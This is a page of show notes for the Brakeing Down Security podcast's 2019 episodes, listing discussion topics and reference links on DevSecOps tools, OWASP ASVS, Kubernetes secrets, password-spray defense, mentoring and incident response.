Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
2019-023-Tanya Janca, Dev Slop, DevOps tools for free or cheap
Announcements:
InfoSec Campout Conference (Eventbrite, social contract, etc): https://www.infoseccampout.com
All Day Devops (https://www.alldaydevops.com) free talks online... Next conference starts 06 November 2019
------
Tanya Janca (@shehackspurple)
@wosectweets - Women of Security
DevOps Tools for free/cheap.
They are all on github right, so they are all free?
Python, Docker, k8s, Jenkins
Licensing can be a problem
Free-mium software, or trialware is useful?
OWASP DevSlop
Module
Nicole Becker
Pixie - insecure instagram
“Betty Coin”
SSLlabs - Qualys
Mentoring Monday:
What is “Mentoring Monday”?
What does it take to be a good mentor?
Should a mentee have a goal in mind?
Something other than “I want to be just like you”?
Do you assist in creating the relationship?
What if they don’t meld?
Are there any restrictions?
Any place in someone’s career?
How do you apply?
Advocating and being a good ally
Leading Cyber Ladies: https://twitter.com/LadiesCyber
WoSec International - https://twitter.com/WoSECtweets
19 Chapters worldwide
Africa, No. America, Europe
Goal? (hacker workshops)
Submitting talks at cons
Outreaching (how would people get involved)
Mentorship involved in this?
Global AppSec
Videos on youtube:
OWASP DevSlop: https://www.youtube.com/channel/UCSmjcWvgVBqF3x_7e5rfe3A
https://www.youtube.com/channel/UCSmjcWvgVBqF3x_7e5rfe3A
Blog Site: https://dev.to/shehackspurple
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
2019-022-Chris Sanders-Rural_Tech_Fund-embracing_the_ATT&CK_Matrix
ANNOUNCEMENTS: INFOSEC CAMPOUT TICKETS ARE STILL ON SALE. Go to https://www.infoseccampout.com for Eventbrite link and more information.
Part 2 of our Discussion with Chris Sanders (@chrissanders88)
Topics discussed:
Companies dropping existing frameworks for ATT&CK Matrix, why?
Rural Technology Fund - What it is, how does it work, Who can help make it more awesome.
https://chrissanders.org/2019/05/infosec-mental-models/
I’ve argued for some time that information security is in a growing state of cognitive crisis…
Demand outweighs supply
Because so many organizations need experience, they are unable to appropriately invest in entry-level jobs and devote the necessary time for internal training.
That’s an HR and hiring manager issue, right? --brbr No. --bboettcher
Information cannot be validated or trusted
There are few authoritative sources of knowledge about critical components and procedures.
Large systemic issues persist with no ability to tackle them in a large, mobilized, or strategic manner.
The industry is unable to organize or widely combat the biggest issues they face.
Groups of individuals, everyone thinking they have the ‘right answer’, just like linux flavors --brbr
https://www.fireeye.com/blog/threat-research/2015/06/caching_out_the_val.html
https://www.helpnetsecurity.com/2018/07/10/windows-shimcache-threat-hunting/
Dependence on tools: http://traffic.libsyn.com/brakeingsecurity/2016-006-Moxie_vs_Mechanism-dependence_on_tools.mp3
https://en.wikipedia.org/wiki/Cognitive_revolution
https://buzzmachine.com/2019/04/25/a-crisis-of-cognition/
How do we solve it?
- We must thoroughly understand the processes used to draw conclusions.
- S.M.A.R.T.?
- Experts must develop repeatable, teachable methods and techniques.
- Educators must build and advocate pedagogy that teaches practitioners how to think.
https://www.maximumfun.org/shows/sawbones - sawbones podcast (amanda mentioned)
Mental Model?
We use them all the time? Gotta simplify the complex...
Distribution and the Bell Curve
Operant Conditioning
https://www.latimes.com/science/la-sci-emotional-stereotypes-about-women-20190530-story.html
The Scientific Method
Applied Models
13 Organ Systems
4 Vital Signs
10 Point Pain scale
Defense in Depth
OSI model
Investigation Process
https://en.wikipedia.org/wiki/Inductive_reasoning
Model Desperation
Companies dumping existing models and embracing something else
The problem is that we’re model hungry and we’ll rapidly use and abuse any reasonable model that presents itself. Ultimately, we want good models because we want a robust toolbox. But, not everything is a job for a hammer and we don’t need fourteen circular saws.
What makes a good model?
Simple
Useful
Imperfect? (wuh?)-brbr
Creating models
Begins by asking a question… (what is the weather going to look like tomorrow? --brbr)
What defines the sandwich? (kind of like “https://en.wikipedia.org/wiki/Theory_of_forms” --brbr)
Discuss the Rural Tech Fund https://twitter.com/RuralTechFund
https://ruraltechfund.org/
Practical Threat Hunting - https://twitter.com/chrissanders88/status/1133388347194454018
Practical Packet Analysis - https://nostarch.com/packetanalysis3
Suggesting books:
https://www.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555
https://www.amazon.com/Undoing-Project-Friendship-Changed-Minds/dp/0393354776
More references on Chris’ site https://chrissanders.org/2019/05/infosec-mental-models/
Book Club
Cult of the dead cow - June
Tribe of Hackers - July
The Mastermind - August
The Cuckoo’s Egg - September
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
2019-021-Chris Sanders discusses a cognitive crisis, mental models, and dependence on tools
https://chrissanders.org/2019/05/infosec-mental-models/
I’ve argued for some time that information security is in a growing state of cognitive crisis…
Demand outweighs supply
Because so many organizations need experience, they are unable to appropriately invest in entry-level jobs and devote the necessary time for internal training.
That’s an HR and hiring manager issue, right? --brbr No. --bboettcher
Information cannot be validated or trusted
There are few authoritative sources of knowledge about critical components and procedures.
Large systemic issues persist with no ability to tackle them in a large, mobilized, or strategic manner.
The industry is unable to organize or widely combat the biggest issues they face.
Groups of individuals, everyone thinking they have the ‘right answer’, just like linux flavors --brbr
https://www.fireeye.com/blog/threat-research/2015/06/caching_out_the_val.html
https://www.helpnetsecurity.com/2018/07/10/windows-shimcache-threat-hunting/
Dependence on tools: http://traffic.libsyn.com/brakeingsecurity/2016-006-Moxie_vs_Mechanism-dependence_on_tools.mp3
https://en.wikipedia.org/wiki/Cognitive_revolution
https://buzzmachine.com/2019/04/25/a-crisis-of-cognition/
How do we solve it?
- We must thoroughly understand the processes used to draw conclusions.
- S.M.A.R.T.?
- Experts must develop repeatable, teachable methods and techniques.
- Educators must build and advocate pedagogy that teaches practitioners how to think.
https://www.maximumfun.org/shows/sawbones - sawbones podcast (amanda mentioned)
Mental Model?
We use them all the time? Gotta simplify the complex...
Distribution and the Bell Curve
Operant Conditioning
https://www.latimes.com/science/la-sci-emotional-stereotypes-about-women-20190530-story.html
The Scientific Method
Applied Models
13 Organ Systems
4 Vital Signs
10 Point Pain scale
Defense in Depth
OSI model
Investigation Process
https://en.wikipedia.org/wiki/Inductive_reasoning
Model Desperation
Companies dumping existing models and embracing something else
The problem is that we’re model hungry and we’ll rapidly use and abuse any reasonable model that presents itself. Ultimately, we want good models because we want a robust toolbox. But, not everything is a job for a hammer and we don’t need fourteen circular saws.
What makes a good model?
Simple
Useful
Imperfect? (wuh?)-brbr
Creating models
Begins by asking a question… (what is the weather going to look like tomorrow? --brbr)
What defines the sandwich? (kind of like “https://en.wikipedia.org/wiki/Theory_of_forms” --brbr)
Discuss the Rural Tech Fund https://twitter.com/RuralTechFund
https://ruraltechfund.org/
Practical Threat Hunting - https://twitter.com/chrissanders88/status/1133388347194454018
Practical Packet Analysis - https://nostarch.com/packetanalysis3
Suggesting books:
https://www.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555
https://www.amazon.com/Undoing-Project-Friendship-Changed-Minds/dp/0393354776
More references on Chris’ site https://chrissanders.org/2019/05/infosec-mental-models/
Book Club
Cult of the dead cow - June
Tribe of Hackers - July
The Mastermind - August
The Cuckoo’s Egg - September
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
2019-020-email_security_controls-windows_scheduler
Bryan got phished (almost) - story time!
https://isc.sans.edu/forums/diary/Do+you+block+new+domain+names/17564/
Through OpenDNS
https://learn-umbrella.cisco.com/product-videos/newly-seen-domains-in-cisco-umbrella
Available January 2017, Umbrella filters newly seen or created domains. By using new domains to host malware and other threats, attackers can outsmart security systems that rely on reputation scores or possibly outdated block lists. Umbrella now stops these domains before they even load.
Also “unknown” category? pros/cons
Good filter time for domains?
Amanda: windows logging issues
well…. FUCKING EVERYTHING CREATES TASKS IN SCHEDULER
https://www.microsoft.com/en-us/windowsforbusiness/windows-atp
Breach news:
https://www.dutchnews.nl/news/2019/05/hackers-steal-key-info-about-home-hunters-from-housing-agency/
FTA: The hackers now have their name, address, contact information and copies of their passport or ID card, which includes their personal identification number, or BSN.
This is sufficient to allow the hackers to open bank accounts or take out loans by using other people’s identity.
Mostly colos, data centers, ‘aaS’ providers
Many in the Mid-West
Book Club
Cult of the dead cow - June
Tribe of Hackers - July
The Mastermind - August
The Cuckoo’s Egg - September
https://www.infoseccampout.com
EventBrite Link:https://www.eventbrite.com/e/infosec-campout-tickets-61915087694
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
2019-019-Securing your RDP and ElasticSearch, InfoSec Campout news
https://static1.squarespace.com/static/556340ece4b0869396f21099/t/5cc9ff79c830253749527277/1556742010186/Red+Team+Practice+Lead.pdf
https://www.reddit.com/r/netsec/comments/bonwil/prevent_a_worm_by_updating_remote_desktop/
https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-security.html
https://www.elastic.co/blog/found-elasticsearch-security
https://dzone.com/articles/securing-your-elasticsearch-cluster-properly
Auth is possible, using reverse proxy… this is basic auth :( https://github.com/Asquera/elasticsearch-http-basic
Here’s one that uses basic auth and LDAP: https://mapr.com/blog/how-secure-elasticsearch-and-kibana/
2fa setup: https://www.elastic.co/guide/en/cloud/current/ec-account-security.html
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 20, 20192019-018-Lesson's I learned, github breach, ransoming github repos
Things I learned this week:
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.helpnetsecurity.com/2019/04/29/docker-hub-breach/
https://www.zdnet.com/article/a-hacker-is-wiping-git-repositories-and-asking-for-a-ransom/
https://attack.mitre.org/techniques/T1003/
https://github.com/giMini/PowerMemory
https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service
https://attack.mitre.org/techniques/T1208/
Published on: May 14, 20192019-017-K8s Security, Kamus, interview with Omer Levi Hevroni
K8s security with Omer Levi Hevroni (@omerlh)
service tickets -
Super-Dev
Omer’s requirements for storing secrets:
Gitops enabled
Kubernetes Native
Secure
“One-way encryption”
Omer’s slides and youtube video:
https://www.slideshare.net/SolutoTLV/can-kubernetes-keep-a-secret
https://www.youtube.com/watch?v=FoM3u8G99pc&&index=14&t=0s
We’ve all experienced it: you’re working on a task, adding some code, and then you need to store some sensitive configuration value. It could be an API key, client secret or an encryption key ― something that’s highly sensitive and must be kept secret. And this is where things get messy. Usually, secret storage is highly coupled with how the code is deployed, and different platforms have different solutions. Kubernetes has a promise to simplify this process by using the native secret object, which, as the name implies, can be used to store secrets or sensitive configurations. Unfortunately, Kubernetes secrets are fundamentally broken, and a developer who tries to use them will definitely have some issues. But no need to worry ― there are solid alternatives for storing secrets securely on Kubernetes platform. One solution is to use Kamus, an open-source, git-ops solution, that created by Soluto, for managing secrets on Kubernetes. Kamus can encrypt a secret so it can be decrypted only by your app on runtime - and not by anyone else. The first part of this session will cover the challenges faced when using Kubernetes secrets (from a usability and security point of view). The second part will discuss some of the existing solutions (Sealed Secrets, Helm Secrets and others), their pros, and cons, and then feature Kamus: how it works, what problems it solves, how it differs from other solutions, and what threats it can help mitigate (and what threats it can’t). The talk will cover all that is required to know so you can run Kamus on your own cluster and use it for secret management. Join me for this session to learn how you can build a Kubernetes cluster than can keep a secret ― for real. Speakers Omer Levi Hevroni
Kubernetes Secrets
Bad, because manifest files hold the user/password, and are encoded in Base64
Could be uploaded to git = super bad
https://kubernetes.io/docs/concepts/configuration/secret/
https://docs.travis-ci.com/user/encryption-keys/
Kamus threat model on Github: https://kamus.soluto.io/docs/threatmodeling/threats_controls/
“FaaS is a relatively new concept that was first made available in 2014 by hook.io and is now implemented in services such as AWS Lambda, Google Cloud Functions, IBM OpenWhisk and Microsoft Azure Functions.”
Best practices: https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster/
https://github.com/owasp-cloud-security/owasp-cloud-security
https://www.omerlh.info/2019/01/19/threat-modeling-as-code/
https://telaviv.appsecglobal.org/
https://github.com/Soluto/kamus
Infosec Campout = www.infoseccampout.com
Published on: May 5, 20192019-016-Conference announcement, and password spray defense
Agenda:
Announce the conference
CFP: up soon
CFW: up soon
Campers: Friday night/Saturday night
Like “toorcamp”, but if it sucks, you can drive home… :D
Limiting tickets, looking for sponsors
To support the conference and future initiatives:
“Infosec Education Foundation”
501c3 non-profit (we are working on the charity part)
Password spraying
https://github.com/dafthack/DomainPasswordSpray
Stories:
https://blog.stealthbits.com/using-stealthdefend-to-defend-against-password-spraying/
http://blog.quadrasystems.net/post/password-spray-attacks-and-four-sure-steps-to-disrupt-them
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/simplifying-password-spraying/
Detecting one to many…..and at what point/threshold during an attack would it be a PITA for the redteam to slow down to
Annoying NXLog CE limitation
Log-MD can help detect? Yep
CTF Club is happening again
Pinkie Pie is running it.
Saturdays at 2 -3 pm
Published on: April 29, 2019
2019-015-Kevin_johnson-incident_response_aftermath
Announcements:
SpecterOps (red Team operations) and Tim Tomes (PWAPT)
Bsides Nashville
https://blog.secureideas.com/2019/04/we-take-security-seriously-and-other-trite-statements.html
“We take security seriously and other trite statements“
Wordpress infrastructure (supply chain failure)
WordPress plugin called Woocommerce was at fault.
Vuln late last year: https://www.bleepingcomputer.com/news/security/wordpress-design-flaw-woocommerce-vulnerability-leads-to-site-takeover/
“According to new research by Simon Scannell, a researcher for PHP Security firm RIPS Tech, when WooCommerce is installed it will create a Shop Manager role that has the "edit_users" WordPress capability/permission. This capability allows users to edit ANY WordPress user, including the Administrator account.”
“https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/”
You (Kevin) discovered the admin accounts, but could not remove them. Was that when you considered this an ‘incident’?
Timeline:
“[2019-03-22 09:03 EST] Kevin assigns members of the Secure Ideas team with reconnaissance and mapping of the AoM system. Kevin reminds these members that Secure Ideas doesn’t have permission to test AoM. They are advised not to do anything that could harm the AoM’s production environment.”
What is the line they should not cross in this case?
You did not have access to logs, you asked that an audit plugin be installed to be able to view logs. Is that permanent, and why did they not allow access to logs prior to?
[2019-03-22 13:11 EST] AoM Support fixes the audit log plugin access. AoM Support has found that a purchase of a course through a Woocommerce plugin resulted in users being granted admin access. AoM Support provides specific order numbers. They have also done an analysis of the database backups from the last 60 days and believe that the attackers did not do anything after they got access. AoM Support announces that the Secure Ideas training site will be set up on a separate server and Secure Ideas will be granted a new level of access.
Seems like working with AoM wasn’t difficult. Was giving you access to your own instance, and allowing you to administer it a big deal for them?
Lessons Learned? Anything you’d do differently next time?
Update IR plan?
Did they reach out for additional testing?
Did the people who got admin get removed?
Consult with AoM on better security implementation? Your env wasn’t damaged, but did they suffer issues with other customers? *answered*
https://en.wikipedia.org/wiki/Gremlins
Gas Station skimmer video - https://www.facebook.com/michellepedraza.journalist/videos/2135141863465247/
https://www.helpnetsecurity.com/2019/04/12/cybersecurity-incident-response-plan/
https://www.guardicore.com/2018/11/security-incident-response-plan/
https://www.zdnet.com/article/security-risks-of-multi-tenancy/
Upcoming SI events
IANS forum (Wash DC)
ShowmeCon
Webcasts
ISC2 security Congress (Wash DC)
Patreon
Slack
Twitter handles
iTunes
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 22, 2019
2019-014-Tesla fails encryption, Albany and Sammamish ransomware attacks.
Announcements:
WorkshopCon Training with SpecterOps and Tim Tomes
www.workshopcon.com
redteam operations with SpecterOps
PWAPT with Tim Tomes
Source Boston: [Boston, MA 2019 (April 29 – May 3, 2019) (https://sourceconference.com/events/boston19/)Trainings: April 29 - April 30, 2019 | Conference: May 1 - 3, 2019
Cybernauts CTF meetup in Austin Texas at Indeed offices, 23 April at 5pm Central time.
https://nakedsecurity.sophos.com/2019/04/02/wrecked-teslas-hang-onto-your-unencrypted-data/
My last car sync’ed the contact list.
Video is a different story, but safety for the vehicle and owner, they’ll probably continue to store it.
Telemetry data is for changing road conditions, navigation, etc
Enable encryption at rest… or pop a fuse to scram the data when/if an accident is detected
Level of difficulty, no fuse, requires hardware upgrade
Encryption at rest, ensuring HTTPS on all incoming/outgoing.
Annoying “do you want notifications from this site?”
Like an annoying RSS feed… ‘Hey, we added a new banner ad!’
https://www.phoronix.com/scan.php?page=news_item&px=Linux-Improve-CPU-Spec-Switches
Why add the switches to allow vulnerabilities?
Slippery slope --disable-dirtycow?
https://www.wamc.org/post/details-still-few-city-albany-s-ransomware-attack
Threat intelligence and software detections…
Got an email… *Story Time from Mr. Boettcher*
Twitter: why do companies not allow copy/paste in password fields? Tesla
Published on: April 15, 20192019-013-ASVSv4 discussion with Daniel Cuthbert and Jim Manico - Part 2
Announcements:
SpecterOps and Tim Tomes are giving training at WorkshopCon https://www.workshopcon.com
Rob Cheyne Source Boston - https://sourceconference.com/events/boston19/
Austin Cybernauts meetup - https://www.eventbrite.com/e/cybernauts-ctf-meetup-indeed-tickets-58816141663
SHOW NOTES:
Architecture is not an implementation, but a way of thinking about a problem that has potentially many different answers, and no one single "correct" answer.
“is to normalize the range in the coverage and level of rigor available in the market when it comes to performing Web application security verification using a commercially-workable open standard. “
#ASVS team:
- Daniel Cuthbert @dcuthbert
- Andrew van der Stock
- Jim Manico @manicode
- Mark Burnett
- Josh C Grossman
https://drive.google.com/file/d/17-NDN7TWdC-vZLbsKkkBFhrYmUhF6907/view?usp=sharing
https://www.owasp.org/images/3/33/OWASP_Application_Security_Verification_Standard_3.0.1.pdf - old version
http://traffic.libsyn.com/brakeingsecurity/2015-046_ASVS_with_Bill_Sempf.mp3 - Older BrakeSec Episode
ASVS Page 14 - “If developers had invested in a single, secure identity provider model, such as SAML federated identity, the identity provider could be updated to incorporate new requirements such as NIST 800-63 compliance, while not changing the interfaces of the original application. If many applications shared the same security architecture and thus that same component, they all benefit from this upgrade at once. However, SAML will not always remain as the best or most suitable authentication solution - it might need to be swapped out for other solutions as requirements change. Changes like this are either complicated, so costly as to necessitate a complete re-write, or outright impossible without security architecture.”
What are the biggest differences between V3 and V4?
Why was a change needed?
https://xkcd.com/936/ - famous XKCD password comic
David Cybuck: Appendix C: IoT
Why was this added?
These controls are in addition to all the other ASVS controls?
How do they see section 1 architecture and section 14, configuration --- in the context of rapid deployment, infrastructure as code, containerization.
You added IoT, but not ICS or SCADA?
https://www.owasp.org/index.php/OWASP_ICS_/_SCADA_Security_Project
BrakeSec IoT Top 10 discussion:
http://traffic.libsyn.com/brakeingsecurity/2019-001.mp3
http://traffic.libsyn.com/brakeingsecurity/2019-002-aaron_guzman_pt2.mp3
Seems incomplete… (Section 1.13 “API”)
Will this be added later?
What is needed to fill that in? (manpower, SME’s, etc?)
3 levels of protection… why have levels at all?
Why shouldn’t everyone be at Level 3?
I just don’t like the term ‘bare minimum’ (level 1)--brbr
Threat modeling blog (leviathan): https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling
Adam Shostack ThreatModeling Book: https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998
https://www.owasp.org/images/archive/6/65/20170626175919!TM-Lessons-Star-Wars-May-2017.pdf
https://www.youtube.com/watch?v=2C7mNr5WMjA
Cost to get to L2? L3?
https://manicode.com/ secure coding education
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 7, 20192019-012: OWASP ASVSv4 discussion with Daniel Cuthbert and Jim Manico - Part 1
Show Notes
SpecterOps and Tim Tomes are giving training at WorkshopCon https://www.workshopcon.com
Rob Cheyne Source Boston - https://sourceconference.com/events/boston19/
Architecture is not an implementation, but a way of thinking about a problem that has potentially many different answers, and no one single "correct" answer.
“is to normalize the range in the coverage and level of rigor available in the market when it comes to performing Web application security verification using a commercially-workable open standard. “
ASVS team:
- Daniel Cuthbert @dcuthbert
- Andrew van der Stock
- Jim Manico @manicode
- Mark Burnett
- Josh C Grossman
Don’t post these links in show notes
ASVS list (google sheet): https://drive.google.com/open?id=1xFLmvNoR2tohk08cQDLU46FWNgpx28wd
ASVS PDF: https://drive.google.com/file/d/17-NDN7TWdC-vZLbsKkkBFhrYmUhF6907/view?usp=sharing
https://www.owasp.org/images/3/33/OWASP_Application_Security_Verification_Standard_3.0.1.pdf - old version
http://traffic.libsyn.com/brakeingsecurity/2015-046_ASVS_with_Bill_Sempf.mp3 - Older BrakeSec Episode
ASVS Page 14 - “If developers had invested in a single, secure identity provider model, such as SAML federated identity, the identity provider could be updated to incorporate new requirements such as NIST 800-63 compliance, while not changing the interfaces of the original application. If many applications shared the same security architecture and thus that same component, they all benefit from this upgrade at once. However, SAML will not always remain as the best or most suitable authentication solution - it might need to be swapped out for other solutions as requirements change. Changes like this are either complicated, so costly as to necessitate a complete re-write, or outright impossible without security architecture.”
What are the biggest differences between V3 and V4?
Why was a change needed?
https://xkcd.com/936/ - famous XKCD password comic
David Cybuck: Appendix C: IoT
Why was this added?
These controls are in addition to all the other ASVS controls?
How do they see section 1 architecture and section 14, configuration --- in the context of rapid deployment, infrastructure as code, containerization.
You added IoT, but not ICS or SCADA?
https://www.owasp.org/index.php/OWASP_ICS_/_SCADA_Security_Project
BrakeSec IoT Top 10 discussion:
http://traffic.libsyn.com/brakeingsecurity/2019-001.mp3
http://traffic.libsyn.com/brakeingsecurity/2019-002-aaron_guzman_pt2.mp3
Seems incomplete… (Section 1.13 “API”)
Will this be added later?
What is needed to fill that in? (manpower, SME’s, etc?)
3 levels of protection… why have levels at all?
Why shouldn’t everyone be at Level 3?
I just don’t like the term ‘bare minimum’ (level 1)--brbr
Threat modeling blog (leviathan): https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling
Adam Shostack ThreatModeling Book: https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998
https://www.owasp.org/images/archive/6/65/20170626175919!TM-Lessons-Star-Wars-May-2017.pdf
https://www.youtube.com/watch?v=2C7mNr5WMjA
Cost to get to L2? L3?
https://manicode.com/ secure coding education
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
